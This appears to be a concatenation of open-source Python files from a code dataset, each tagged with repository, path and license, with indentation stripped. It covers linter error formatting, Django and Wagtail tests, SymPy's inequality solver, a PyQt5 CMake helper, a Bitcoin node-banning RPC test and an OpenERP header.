"""Get a output line for an error in UNIX format."""
line = ''
if error.token:
line = '%d' % error.token.line_number
error_code = '%04d' % error.code
if new_error:
error_code = 'New Error ' + error_code
return '%s:%s:(%s) %s' % (filename, line, error_code, error.message)
def GetErrorOutput(error, new_error=False):
"""Get a output line for an error in regular format."""
line = ''
if error.token:
line = 'Line %d, ' % error.token.line_number
code = 'E:%04d' % error.code
error_message = error.message
if new_error:
error_message = 'New Error ' + error_message
return '%s%s: %s' % (line, code, error.message)
| bsd-3-clause |
GdZ/scriptfile | software/googleAppEngine/lib/django_1_2/tests/regressiontests/test_client_regress/urls.py | 46 | 1903 | from django.conf.urls.defaults import *
from django.views.generic.simple import redirect_to
import views
urlpatterns = patterns('',
(r'^no_template_view/$', views.no_template_view),
(r'^staff_only/$', views.staff_only_view),
(r'^get_view/$', views.get_view),
(r'^request_data/$', views.request_data),
(r'^request_data_extended/$', views.request_data, {'template':'extended.html', 'data':'bacon'}),
url(r'^arg_view/(?P<name>.+)/$', views.view_with_argument, name='arg_view'),
(r'^login_protected_redirect_view/$', views.login_protected_redirect_view),
(r'^redirects/$', redirect_to, {'url': '/test_client_regress/redirects/further/'}),
(r'^redirects/further/$', redirect_to, {'url': '/test_client_regress/redirects/further/more/'}),
(r'^redirects/further/more/$', redirect_to, {'url': '/test_client_regress/no_template_view/'}),
(r'^redirect_to_non_existent_view/$', redirect_to, {'url': '/test_client_regress/non_existent_view/'}),
(r'^redirect_to_non_existent_view2/$', redirect_to, {'url': '/test_client_regress/redirect_to_non_existent_view/'}),
(r'^redirect_to_self/$', redirect_to, {'url': '/test_client_regress/redirect_to_self/'}),
(r'^circular_redirect_1/$', redirect_to, {'url': '/test_client_regress/circular_redirect_2/'}),
(r'^circular_redirect_2/$', redirect_to, {'url': '/test_client_regress/circular_redirect_3/'}),
(r'^circular_redirect_3/$', redirect_to, {'url': '/test_client_regress/circular_redirect_1/'}),
(r'^set_session/$', views.set_session_view),
(r'^check_session/$', views.check_session_view),
(r'^request_methods/$', views.request_methods_view),
(r'^check_unicode/$', views.return_unicode),
(r'^parse_unicode_json/$', views.return_json_file),
(r'^check_headers/$', views.check_headers),
(r'^check_headers_redirect/$', redirect_to, {'url': '/test_client_regress/check_headers/'}),
)
| mit |
wagtail/wagtail | wagtail/core/tests/test_management_commands.py | 7 | 17243 | from datetime import timedelta
from io import StringIO
from unittest import mock
from django.contrib.auth import get_user_model
from django.core import management
from django.db import models
from django.test import TestCase
from django.utils import timezone
from wagtail.core.models import Collection, Page, PageLogEntry, PageRevision
from wagtail.core.signals import page_published, page_unpublished
from wagtail.tests.testapp.models import EventPage, SimplePage
class TestFixTreeCommand(TestCase):
fixtures = ['test.json']
def badly_delete_page(self, page):
# Deletes a page the wrong way.
# This will not update numchild and may leave orphans
models.Model.delete(page)
def run_command(self, **options):
options.setdefault('interactive', False)
output = StringIO()
management.call_command('fixtree', stdout=output, **options)
output.seek(0)
return output
def test_fixes_numchild(self):
# Get homepage and save old value
homepage = Page.objects.get(url_path='/home/')
old_numchild = homepage.numchild
# Break it
homepage.numchild = 12345
homepage.save()
# Check that its broken
self.assertEqual(Page.objects.get(url_path='/home/').numchild, 12345)
# Call command
self.run_command()
# Check if its fixed
self.assertEqual(Page.objects.get(url_path='/home/').numchild, old_numchild)
def test_fixes_depth(self):
# Get homepage and save old value
homepage = Page.objects.get(url_path='/home/')
old_depth = homepage.depth
# Break it
homepage.depth = 12345
homepage.save()
# also break the root collection's depth
root_collection = Collection.get_first_root_node()
root_collection.depth = 42
root_collection.save()
# Check that its broken
self.assertEqual(Page.objects.get(url_path='/home/').depth, 12345)
self.assertEqual(Collection.objects.get(id=root_collection.id).depth, 42)
# Call command
self.run_command()
# Check if its fixed
self.assertEqual(Page.objects.get(url_path='/home/').depth, old_depth)
self.assertEqual(Collection.objects.get(id=root_collection.id).depth, 1)
def test_detects_orphans(self):
events_index = Page.objects.get(url_path='/home/events/')
christmas_page = EventPage.objects.get(url_path='/home/events/christmas/')
# Delete the events index badly
self.badly_delete_page(events_index)
# Check that christmas_page is still in the tree
self.assertTrue(Page.objects.filter(id=christmas_page.id).exists())
# Call command
output = self.run_command()
# Check that the issues were detected
output_string = output.read()
self.assertIn("Incorrect numchild value found for pages: [2]", output_string)
# Note that page ID 15 was also deleted, but is not picked up here, as
# it is a child of 14.
self.assertIn("Orphaned pages found: [4, 5, 6, 9, 13, 15]", output_string)
# Check that christmas_page is still in the tree
self.assertTrue(Page.objects.filter(id=christmas_page.id).exists())
def test_deletes_orphans(self):
events_index = Page.objects.get(url_path='/home/events/')
christmas_page = EventPage.objects.get(url_path='/home/events/christmas/')
# Delete the events index badly
self.badly_delete_page(events_index)
# Check that christmas_page is still in the tree
self.assertTrue(Page.objects.filter(id=christmas_page.id).exists())
# Call command
# delete_orphans simulates a user pressing "y" at the prompt
output = self.run_command(delete_orphans=True)
# Check that the issues were detected
output_string = output.read()
self.assertIn("Incorrect numchild value found for pages: [2]", output_string)
self.assertIn("7 orphaned pages deleted.", output_string)
# Check that christmas_page has been deleted
self.assertFalse(Page.objects.filter(id=christmas_page.id).exists())
def test_remove_path_holes(self):
events_index = Page.objects.get(url_path='/home/events/')
# Delete the event page in path position 0001
Page.objects.get(path=events_index.path + '0001').delete()
self.run_command(full=True)
# the gap at position 0001 should have been closed
events_index = Page.objects.get(url_path='/home/events/')
self.assertTrue(Page.objects.filter(path=events_index.path + '0001').exists())
class TestMovePagesCommand(TestCase):
fixtures = ['test.json']
def run_command(self, from_, to):
management.call_command('move_pages', str(from_), str(to), stdout=StringIO())
def test_move_pages(self):
# Get pages
events_index = Page.objects.get(url_path='/home/events/')
about_us = Page.objects.get(url_path='/home/about-us/')
page_ids = events_index.get_children().values_list('id', flat=True)
# Move all events into "about us"
self.run_command(events_index.id, about_us.id)
# Check that all pages moved
for page_id in page_ids:
self.assertEqual(Page.objects.get(id=page_id).get_parent(), about_us)
class TestSetUrlPathsCommand(TestCase):
fixtures = ['test.json']
def run_command(self):
management.call_command('set_url_paths', stdout=StringIO())
def test_set_url_paths(self):
self.run_command()
class TestReplaceTextCommand(TestCase):
fixtures = ['test.json']
def run_command(self, from_text, to_text):
management.call_command('replace_text', from_text, to_text, stdout=StringIO())
def test_replace_text(self):
# Check that the christmas page is definitely about christmas
christmas_page = EventPage.objects.get(url_path='/home/events/christmas/')
self.assertEqual(christmas_page.title, "Christmas")
self.assertEqual(christmas_page.speakers.first().last_name, "Christmas")
self.assertEqual(christmas_page.advert_placements.first().colour, "greener than a Christmas tree")
# Make it about easter
self.run_command("Christmas", "Easter")
# Check that it's now about easter
easter_page = EventPage.objects.get(url_path='/home/events/christmas/')
self.assertEqual(easter_page.title, "Easter")
# Check that we also update the child objects (including advert_placements, which is defined on the superclass)
self.assertEqual(easter_page.speakers.first().last_name, "Easter")
self.assertEqual(easter_page.advert_placements.first().colour, "greener than a Easter tree")
class TestPublishScheduledPagesCommand(TestCase):
def setUp(self):
# Find root page
self.root_page = Page.objects.get(id=2)
def test_go_live_page_will_be_published(self):
# Connect a mock signal handler to page_published signal
signal_fired = [False]
signal_page = [None]
def page_published_handler(sender, instance, **kwargs):
signal_fired[0] = True
signal_page[0] = instance
page_published.connect(page_published_handler)
page = SimplePage(
title="Hello world!",
slug="hello-world",
content="hello",
live=False,
has_unpublished_changes=True,
go_live_at=timezone.now() - timedelta(days=1),
)
self.root_page.add_child(instance=page)
page.save_revision(approved_go_live_at=timezone.now() - timedelta(days=1))
p = Page.objects.get(slug='hello-world')
self.assertFalse(p.live)
self.assertTrue(PageRevision.objects.filter(page=p).exclude(approved_go_live_at__isnull=True).exists())
management.call_command('publish_scheduled_pages')
p = Page.objects.get(slug='hello-world')
self.assertTrue(p.live)
self.assertTrue(p.first_published_at)
self.assertFalse(p.has_unpublished_changes)
self.assertFalse(PageRevision.objects.filter(page=p).exclude(approved_go_live_at__isnull=True).exists())
# Check that the page_published signal was fired
self.assertTrue(signal_fired[0])
self.assertEqual(signal_page[0], page)
self.assertEqual(signal_page[0], signal_page[0].specific)
def test_go_live_when_newer_revision_exists(self):
page = SimplePage(
title="Hello world!",
slug="hello-world",
content="hello",
live=False,
has_unpublished_changes=True,
go_live_at=timezone.now() - timedelta(days=1),
)
self.root_page.add_child(instance=page)
page.save_revision(approved_go_live_at=timezone.now() - timedelta(days=1))
page.title = "Goodbye world!"
page.save_revision(submitted_for_moderation=False)
management.call_command('publish_scheduled_pages')
p = Page.objects.get(slug='hello-world')
self.assertTrue(p.live)
self.assertTrue(p.has_unpublished_changes)
self.assertEqual(p.title, "Hello world!")
def test_future_go_live_page_will_not_be_published(self):
page = SimplePage(
title="Hello world!",
slug="hello-world",
content="hello",
live=False,
go_live_at=timezone.now() + timedelta(days=1),
)
self.root_page.add_child(instance=page)
page.save_revision(approved_go_live_at=timezone.now() - timedelta(days=1))
p = Page.objects.get(slug='hello-world')
self.assertFalse(p.live)
self.assertTrue(PageRevision.objects.filter(page=p).exclude(approved_go_live_at__isnull=True).exists())
management.call_command('publish_scheduled_pages')
p = Page.objects.get(slug='hello-world')
self.assertFalse(p.live)
self.assertTrue(PageRevision.objects.filter(page=p).exclude(approved_go_live_at__isnull=True).exists())
def test_expired_page_will_be_unpublished(self):
# Connect a mock signal handler to page_unpublished signal
signal_fired = [False]
signal_page = [None]
def page_unpublished_handler(sender, instance, **kwargs):
signal_fired[0] = True
signal_page[0] = instance
page_unpublished.connect(page_unpublished_handler)
page = SimplePage(
title="Hello world!",
slug="hello-world",
content="hello",
live=True,
has_unpublished_changes=False,
expire_at=timezone.now() - timedelta(days=1),
)
self.root_page.add_child(instance=page)
p = Page.objects.get(slug='hello-world')
self.assertTrue(p.live)
management.call_command('publish_scheduled_pages')
p = Page.objects.get(slug='hello-world')
self.assertFalse(p.live)
self.assertTrue(p.has_unpublished_changes)
self.assertTrue(p.expired)
# Check that the page_published signal was fired
self.assertTrue(signal_fired[0])
self.assertEqual(signal_page[0], page)
self.assertEqual(signal_page[0], signal_page[0].specific)
def test_future_expired_page_will_not_be_unpublished(self):
page = SimplePage(
title="Hello world!",
slug="hello-world",
content="hello",
live=True,
expire_at=timezone.now() + timedelta(days=1),
)
self.root_page.add_child(instance=page)
p = Page.objects.get(slug='hello-world')
self.assertTrue(p.live)
management.call_command('publish_scheduled_pages')
p = Page.objects.get(slug='hello-world')
self.assertTrue(p.live)
self.assertFalse(p.expired)
def test_expired_pages_are_dropped_from_mod_queue(self):
page = SimplePage(
title="Hello world!",
slug="hello-world",
content="hello",
live=False,
expire_at=timezone.now() - timedelta(days=1),
)
self.root_page.add_child(instance=page)
page.save_revision(submitted_for_moderation=True)
p = Page.objects.get(slug='hello-world')
self.assertFalse(p.live)
self.assertTrue(PageRevision.objects.filter(page=p, submitted_for_moderation=True).exists())
management.call_command('publish_scheduled_pages')
p = Page.objects.get(slug='hello-world')
self.assertFalse(PageRevision.objects.filter(page=p, submitted_for_moderation=True).exists())
class TestPurgeRevisionsCommand(TestCase):
fixtures = ['test.json']
def setUp(self):
# Find root page
self.root_page = Page.objects.get(id=2)
self.page = SimplePage(
title="Hello world!",
slug="hello-world",
content="hello",
live=False,
)
self.root_page.add_child(instance=self.page)
self.page.refresh_from_db()
def run_command(self, days=None):
if days:
days_input = '--days=' + str(days)
return management.call_command('purge_revisions', days_input, stdout=StringIO())
return management.call_command('purge_revisions', stdout=StringIO())
def test_latest_revision_not_purged(self):
revision_1 = self.page.save_revision()
revision_2 = self.page.save_revision()
self.run_command()
# revision 1 should be deleted, revision 2 should not be
self.assertNotIn(revision_1, PageRevision.objects.filter(page=self.page))
self.assertIn(revision_2, PageRevision.objects.filter(page=self.page))
def test_revisions_in_moderation_not_purged(self):
self.page.save_revision(submitted_for_moderation=True)
revision = self.page.save_revision()
self.run_command()
self.assertTrue(PageRevision.objects.filter(page=self.page, submitted_for_moderation=True).exists())
try:
from wagtail.core.models import Task, Workflow, WorkflowTask
workflow = Workflow.objects.create(name='test_workflow')
task_1 = Task.objects.create(name='test_task_1')
user = get_user_model().objects.first()
WorkflowTask.objects.create(workflow=workflow, task=task_1, sort_order=1)
workflow.start(self.page, user)
self.page.save_revision()
self.run_command()
# even though no longer the latest revision, the old revision should stay as it is
# attached to an in progress workflow
self.assertIn(revision, PageRevision.objects.filter(page=self.page))
except ImportError:
pass
def test_revisions_with_approve_go_live_not_purged(self):
approved_revision = self.page.save_revision(approved_go_live_at=timezone.now() + timedelta(days=1))
self.page.save_revision()
self.run_command()
self.assertIn(approved_revision, PageRevision.objects.filter(page=self.page))
def test_purge_revisions_with_date_cutoff(self):
old_revision = self.page.save_revision()
self.page.save_revision()
self.run_command(days=30)
# revision should not be deleted, as it is younger than 30 days
self.assertIn(old_revision, PageRevision.objects.filter(page=self.page))
old_revision.created_at = timezone.now() - timedelta(days=31)
old_revision.save()
self.run_command(days=30)
# revision is now older than 30 days, so should be deleted
self.assertNotIn(old_revision, PageRevision.objects.filter(page=self.page))
class TestCreateLogEntriesFromRevisionsCommand(TestCase):
fixtures = ['test.json']
def setUp(self):
self.page = SimplePage(
title="Hello world!",
slug="hello-world",
content="hello",
live=False,
expire_at=timezone.now() - timedelta(days=1),
)
Page.objects.get(id=2).add_child(instance=self.page)
# Create empty revisions, which should not be converted to log entries
for i in range(3):
self.page.save_revision()
# Add another revision with a content change
self.page.title = "Hello world!!"
revision = self.page.save_revision()
revision.publish()
# clean up log entries
PageLogEntry.objects.all().delete()
def test_log_entries_created_from_revisions(self):
management.call_command('create_log_entries_from_revisions')
# Should not create entries for empty revisions.
self.assertListEqual(
list(PageLogEntry.objects.values_list("action", flat=True)),
['wagtail.publish', 'wagtail.edit', 'wagtail.create']
)
def test_command_doesnt_crash_for_revisions_without_page_model(self):
with mock.patch(
'wagtail.core.models.ContentType.model_class',
return_value=None,
):
management.call_command('create_log_entries_from_revisions')
self.assertEqual(PageLogEntry.objects.count(), 0)
| bsd-3-clause |
srjoglekar246/sympy | sympy/solvers/inequalities.py | 2 | 11736 | """Tools for solving inequalities and systems of inequalities. """
from sympy.core import Symbol, Interval
from sympy.core.relational import Relational, Eq, Ge, Lt
from sympy.core.singleton import S
from sympy.assumptions import ask, AppliedPredicate, Q
from sympy.functions import re, im, Abs
from sympy.logic import And
from sympy.polys import Poly
def solve_poly_inequality(poly, rel):
"""Solve a polynomial inequality with rational coefficients.
Examples
========
>>> from sympy import Poly
>>> from sympy.abc import x
>>> from sympy.solvers.inequalities import solve_poly_inequality
>>> solve_poly_inequality(Poly(x, x, domain='ZZ'), '==')
[{0}]
>>> solve_poly_inequality(Poly(x**2 - 1, x, domain='ZZ'), '!=')
[(-oo, -1), (-1, 1), (1, oo)]
>>> solve_poly_inequality(Poly(x**2 - 1, x, domain='ZZ'), '==')
[{-1}, {1}]
See Also
========
solve_poly_inequalities
"""
reals, intervals = poly.real_roots(multiple=False), []
if rel == '==':
for root, _ in reals:
interval = Interval(root, root)
intervals.append(interval)
elif rel == '!=':
left = S.NegativeInfinity
for right, _ in reals + [(S.Infinity, 1)]:
interval = Interval(left, right, True, True)
intervals.append(interval)
left = right
else:
if poly.LC() > 0:
sign = +1
else:
sign = -1
eq_sign, equal = None, False
if rel == '>':
eq_sign = +1
elif rel == '<':
eq_sign = -1
elif rel == '>=':
eq_sign, equal = +1, True
elif rel == '<=':
eq_sign, equal = -1, True
else:
raise ValueError("'%s' is not a valid relation" % rel)
right, right_open = S.Infinity, True
reals.sort(key=lambda w: w[0], reverse=True)
for left, multiplicity in reals:
if multiplicity % 2:
if sign == eq_sign:
intervals.insert(0, Interval(left, right, not equal, right_open))
sign, right, right_open = -sign, left, not equal
else:
if sign == eq_sign and not equal:
intervals.insert(0, Interval(left, right, True, right_open))
right, right_open = left, True
elif sign != eq_sign and equal:
intervals.insert(0, Interval(left, left))
if sign == eq_sign:
intervals.insert(0, Interval(S.NegativeInfinity, right, True, right_open))
return intervals
def solve_poly_inequalities(polys):
"""Solve a system of polynomial inequalities with rational coefficients.
Examples
========
>>> from sympy.abc import x
>>> from sympy import Poly
>>> from sympy.solvers.inequalities import solve_poly_inequalities
>>> solve_poly_inequalities([[(Poly(-x + 1, x, domain='ZZ'), '>='),
... (Poly(-x + 1, x, domain='ZZ'), '<=')]])
{1}
>>> solve_poly_inequalities([[(Poly(x, x, domain='ZZ'), '!='),
... (Poly(-x + 1, x, domain='ZZ'), '>=')]])
(-oo, 0) U (0, 1]
See Also
========
solve_poly_inequality
"""
result = S.EmptySet
for _polys in polys:
global_intervals = None
for poly, rel in _polys:
local_intervals = solve_poly_inequality(poly, rel)
if global_intervals is None:
global_intervals = local_intervals
else:
intervals = []
for local_interval in local_intervals:
for global_interval in global_intervals:
interval = local_interval.intersect(global_interval)
if interval is not S.EmptySet:
intervals.append(interval)
global_intervals = intervals
if not global_intervals:
break
for interval in global_intervals:
result = result.union(interval)
return result
def reduce_poly_inequalities(exprs, gen, assume=True, relational=True):
"""Reduce a system of polynomial inequalities with rational coefficients.
Examples
========
>>> from sympy import Poly, Symbol
>>> from sympy.solvers.inequalities import reduce_poly_inequalities
>>> x = Symbol('x', real=True)
>>> reduce_poly_inequalities([[x**2 <= 0]], x)
x == 0
>>> reduce_poly_inequalities([[x + 2 > 0]], x)
-2 < x
"""
exact = True
polys = []
for _exprs in exprs:
_polys = []
for expr in _exprs:
if isinstance(expr, tuple):
expr, rel = expr
else:
if expr.is_Relational:
expr, rel = expr.lhs - expr.rhs, expr.rel_op
else:
expr, rel = expr, '=='
poly = Poly(expr, gen)
if not poly.get_domain().is_Exact:
poly, exact = poly.to_exact(), False
domain = poly.get_domain()
if not (domain.is_ZZ or domain.is_QQ):
raise NotImplementedError("inequality solving is not supported over %s" % domain)
_polys.append((poly, rel))
polys.append(_polys)
solution = solve_poly_inequalities(polys)
if not exact:
solution = solution.evalf()
if not relational:
return solution
real = ask(Q.real(gen), assumptions=assume)
if not real:
result = And(solution.as_relational(re(gen)), Eq(im(gen), 0))
else:
result = solution.as_relational(gen)
return result
def reduce_abs_inequality(expr, rel, gen, assume=True):
"""Reduce an inequality with nested absolute values.
Examples
========
>>> from sympy import Q, Abs
>>> from sympy.abc import x
>>> from sympy.solvers.inequalities import reduce_abs_inequality
>>> reduce_abs_inequality(Abs(x - 5) - 3, '<', x, assume=Q.real(x))
And(2 < x, x < 8)
>>> reduce_abs_inequality(Abs(x + 2)*3 - 13, '<', x, assume=Q.real(x))
And(-19/3 < x, x < 7/3)
See Also
========
reduce_abs_inequalities
"""
if not ask(Q.real(gen), assumptions=assume):
raise NotImplementedError("can't solve inequalities with absolute values of a complex variable")
def _bottom_up_scan(expr):
exprs = []
if expr.is_Add or expr.is_Mul:
op = expr.__class__
for arg in expr.args:
_exprs = _bottom_up_scan(arg)
if not exprs:
exprs = _exprs
else:
args = []
for expr, conds in exprs:
for _expr, _conds in _exprs:
args.append((op(expr, _expr), conds + _conds))
exprs = args
elif expr.is_Pow:
n = expr.exp
if not n.is_Integer or n < 0:
raise ValueError("only non-negative integer powers are allowed")
_exprs = _bottom_up_scan(expr.base)
for expr, conds in _exprs:
exprs.append((expr**n, conds))
elif isinstance(expr, Abs):
_exprs = _bottom_up_scan(expr.args[0])
for expr, conds in _exprs:
exprs.append(( expr, conds + [Ge(expr, 0)]))
exprs.append((-expr, conds + [Lt(expr, 0)]))
else:
exprs = [(expr, [])]
return exprs
exprs = _bottom_up_scan(expr)
mapping = {'<': '>', '<=': '>='}
inequalities = []
for expr, conds in exprs:
if rel not in mapping.keys():
expr = Relational( expr, 0, rel)
else:
expr = Relational(-expr, 0, mapping[rel])
inequalities.append([expr] + conds)
return reduce_poly_inequalities(inequalities, gen, assume)
def reduce_abs_inequalities(exprs, gen, assume=True):
"""Reduce a system of inequalities with nested absolute values.
Examples
========
>>> from sympy import Q, Abs
>>> from sympy.abc import x
>>> from sympy.solvers.inequalities import reduce_abs_inequalities
>>> reduce_abs_inequalities([(Abs(3*x - 5) - 7, '<'),
... (Abs(x + 25) - 13, '>')], x, assume=Q.real(x))
And(-2/3 < x, Or(-12 < x, x < -38), x < 4)
>>> reduce_abs_inequalities([(Abs(x - 4) + Abs(3*x - 5) - 7, '<')], x,
... assume=Q.real(x))
And(1/2 < x, x < 4)
See Also
========
reduce_abs_inequality
"""
return And(*[ reduce_abs_inequality(expr, rel, gen, assume) for expr, rel in exprs ])
def _solve_inequality(ie, s):
""" A hacky replacement for solve, since the latter only works for
univariate inequalities. """
from sympy import Poly
if not ie.rel_op in ('>', '>=', '<', '<='):
raise NotImplementedError
expr = ie.lhs - ie.rhs
p = Poly(expr, s)
if p.degree() != 1:
raise NotImplementedError('%s' % ie)
a, b = p.all_coeffs()
if a.is_positive:
return ie.func(s, -b/a)
elif a.is_negative:
return ie.func(-b/a, s)
else:
raise NotImplementedError
def reduce_inequalities(inequalities, assume=True, symbols=[]):
"""Reduce a system of inequalities with rational coefficients.
Examples
========
>>> from sympy import Q, sympify as S
>>> from sympy.abc import x, y
>>> from sympy.solvers.inequalities import reduce_inequalities
>>> reduce_inequalities(S(0) <= x + 3, Q.real(x), [])
-3 <= x
>>> reduce_inequalities(S(0) <= x + y*2 - 1, True, [x])
-2*y + 1 <= x
"""
if not hasattr(inequalities, '__iter__'):
inequalities = [inequalities]
if len(inequalities) == 1 and len(symbols) == 1 \
and inequalities[0].is_Relational:
try:
return _solve_inequality(inequalities[0], symbols[0])
except NotImplementedError:
pass
poly_part, abs_part, extra_assume = {}, {}, []
for inequality in inequalities:
if isinstance(inequality, bool):
if inequality is False:
return False
else:
continue
if isinstance(inequality, AppliedPredicate):
extra_assume.append(inequality)
continue
if inequality.is_Relational:
expr, rel = inequality.lhs - inequality.rhs, inequality.rel_op
else:
expr, rel = inequality, '=='
gens = expr.atoms(Symbol)
if not gens:
return False
elif len(gens) == 1:
gen = gens.pop()
else:
raise NotImplementedError("only univariate inequalities are supported")
components = expr.find(lambda u: u.is_Function)
if not components:
if gen in poly_part:
poly_part[gen].append((expr, rel))
else:
poly_part[gen] = [(expr, rel)]
else:
if all(isinstance(comp, Abs) for comp in components):
if gen in abs_part:
abs_part[gen].append((expr, rel))
else:
abs_part[gen] = [(expr, rel)]
else:
raise NotImplementedError("can't reduce %s" % inequalities)
extra_assume = And(*extra_assume)
if assume is not None:
assume = And(assume, extra_assume)
else:
assume = extra_assume
poly_reduced = []
abs_reduced = []
for gen, exprs in poly_part.iteritems():
poly_reduced.append(reduce_poly_inequalities([exprs], gen, assume))
for gen, exprs in abs_part.iteritems():
abs_reduced.append(reduce_abs_inequalities(exprs, gen, assume))
return And(*(poly_reduced + abs_reduced))
| bsd-3-clause |
ccrook/Quantum-GIS | cmake/FindPyQt5.py | 9 | 3619 | # -*- coding: utf-8 -*-
#
# Copyright (c) 2007, Simon Edwards <simon@simonzone.com>
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the Simon Edwards <simon@simonzone.com> nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY Simon Edwards <simon@simonzone.com> ''AS IS'' AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL Simon Edwards <simon@simonzone.com> BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# FindPyQt.py
# Copyright (c) 2007, Simon Edwards <simon@simonzone.com>
# Redistribution and use is allowed according to the terms of the BSD license.
# For details see the accompanying COPYING-CMAKE-SCRIPTS file.
try:
import PyQt5.pyqtconfig
pyqtcfg = PyQt5.pyqtconfig.Configuration()
except ImportError:
import PyQt5.QtCore
import sipconfig # won't work for SIP v5
import os.path
import sys
cfg = sipconfig.Configuration()
sip_dir = cfg.default_sip_dir
if sys.platform.startswith('freebsd'):
py_version = str(sys.version_info.major) + str(sys.version_info.minor)
sip_dir = sip_dir.replace(py_version, '')
for p in (os.path.join(sip_dir, "PyQt5"),
os.path.join(sip_dir, "PyQt5-3"),
sip_dir):
if os.path.exists(os.path.join(p, "QtCore", "QtCoremod.sip")):
sip_dir = p
break
cfg = {
'pyqt_version': PyQt5.QtCore.PYQT_VERSION,
'pyqt_version_str': PyQt5.QtCore.PYQT_VERSION_STR,
'pyqt_sip_flags': PyQt5.QtCore.PYQT_CONFIGURATION['sip_flags'],
'pyqt_mod_dir': os.path.join(cfg.default_mod_dir, "PyQt5"),
'pyqt_sip_dir': sip_dir,
'pyqt_bin_dir': cfg.default_bin_dir,
}
pyqtcfg = sipconfig.Configuration([cfg])
print("pyqt_version:%06.0x" % pyqtcfg.pyqt_version)
print("pyqt_version_num:%d" % pyqtcfg.pyqt_version)
print("pyqt_version_str:%s" % pyqtcfg.pyqt_version_str)
pyqt_version_tag = ""
in_t = False
for item in pyqtcfg.pyqt_sip_flags.split(' '):
if item == "-t":
in_t = True
elif in_t:
if item.startswith("Qt_4"):
pyqt_version_tag = item
else:
in_t = False
print("pyqt_version_tag:%s" % pyqt_version_tag)
print("pyqt_mod_dir:%s" % pyqtcfg.pyqt_mod_dir)
print("pyqt_sip_dir:%s" % pyqtcfg.pyqt_sip_dir)
print("pyqt_sip_flags:%s" % pyqtcfg.pyqt_sip_flags)
print("pyqt_bin_dir:%s" % pyqtcfg.pyqt_bin_dir)
| gpl-2.0 |
torresalyssa/bitcoin | qa/rpc-tests/nodehandling.py | 56 | 3626 | #!/usr/bin/env python2
# Copyright (c) 2014 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
# Test node handling
#
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import *
import base64
try:
import http.client as httplib
except ImportError:
import httplib
try:
import urllib.parse as urlparse
except ImportError:
import urlparse
class NodeHandlingTest (BitcoinTestFramework):
def run_test(self):
###########################
# setban/listbanned tests #
###########################
assert_equal(len(self.nodes[2].getpeerinfo()), 4) #we should have 4 nodes at this point
self.nodes[2].setban("127.0.0.1", "add")
time.sleep(3) #wait till the nodes are disconected
assert_equal(len(self.nodes[2].getpeerinfo()), 0) #all nodes must be disconnected at this point
assert_equal(len(self.nodes[2].listbanned()), 1)
self.nodes[2].clearbanned()
assert_equal(len(self.nodes[2].listbanned()), 0)
self.nodes[2].setban("127.0.0.0/24", "add")
assert_equal(len(self.nodes[2].listbanned()), 1)
try:
self.nodes[2].setban("127.0.0.1", "add") #throws exception because 127.0.0.1 is within range 127.0.0.0/24
except:
pass
assert_equal(len(self.nodes[2].listbanned()), 1) #still only one banned ip because 127.0.0.1 is within the range of 127.0.0.0/24
try:
self.nodes[2].setban("127.0.0.1", "remove")
except:
pass
assert_equal(len(self.nodes[2].listbanned()), 1)
self.nodes[2].setban("127.0.0.0/24", "remove")
assert_equal(len(self.nodes[2].listbanned()), 0)
self.nodes[2].clearbanned()
assert_equal(len(self.nodes[2].listbanned()), 0)
##test persisted banlist
self.nodes[2].setban("127.0.0.0/32", "add")
self.nodes[2].setban("127.0.0.0/24", "add")
self.nodes[2].setban("192.168.0.1", "add", 1) #ban for 1 seconds
self.nodes[2].setban("2001:4d48:ac57:400:cacf:e9ff:fe1d:9c63/19", "add", 1000) #ban for 1000 seconds
listBeforeShutdown = self.nodes[2].listbanned();
assert_equal("192.168.0.1/255.255.255.255", listBeforeShutdown[2]['address']) #must be here
time.sleep(2) #make 100% sure we expired 192.168.0.1 node time
#stop node
stop_node(self.nodes[2], 2)
self.nodes[2] = start_node(2, self.options.tmpdir)
listAfterShutdown = self.nodes[2].listbanned();
assert_equal("127.0.0.0/255.255.255.0", listAfterShutdown[0]['address'])
assert_equal("127.0.0.0/255.255.255.255", listAfterShutdown[1]['address'])
assert_equal("2001:4000::/ffff:e000:0:0:0:0:0:0", listAfterShutdown[2]['address'])
###########################
# RPC disconnectnode test #
###########################
url = urlparse.urlparse(self.nodes[1].url)
self.nodes[0].disconnectnode(url.hostname+":"+str(p2p_port(1)))
time.sleep(2) #disconnecting a node needs a little bit of time
for node in self.nodes[0].getpeerinfo():
assert(node['addr'] != url.hostname+":"+str(p2p_port(1)))
connect_nodes_bi(self.nodes,0,1) #reconnect the node
found = False
for node in self.nodes[0].getpeerinfo():
if node['addr'] == url.hostname+":"+str(p2p_port(1)):
found = True
assert(found)
if __name__ == '__main__':
NodeHandlingTest ().main ()
| mit |
quanvm009/codev7 | openerp/addons/project_timesheet/report/__init__.py | 441 | 1063 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
